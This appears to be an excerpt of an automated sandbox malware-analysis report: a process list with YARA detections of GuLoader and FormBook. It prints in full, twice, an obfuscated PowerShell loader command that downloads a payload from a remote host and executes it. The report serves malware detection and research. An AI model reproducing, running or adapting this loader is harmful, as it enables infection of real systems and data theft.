                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. 
betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh 
EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl 
NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. 
Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;"
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:08:49:42
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:08:49:51
                                          Start date:05/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. 
betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh 
EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl 
NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. 
Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;"
                                          Imagebase:0x140000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2059188423.00000000085C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2059480573.000000000CD15000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:08:49:51
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:08:50:11
                                          Start date:05/10/2024
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\syswow64\msiexec.exe"
                                          Imagebase:0x9b0000
                                          File size:59'904 bytes
                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:08:50:52
                                          Start date:05/10/2024
                                          Path:C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe"
                                          Imagebase:0x930000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:13
                                          Start time:08:50:54
                                          Start date:05/10/2024
                                          Path:C:\Windows\SysWOW64\msinfo32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                          Imagebase:0x270000
                                          File size:338'432 bytes
                                          MD5 hash:5C49B7B55D4AF40DB1047E08484D6656
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

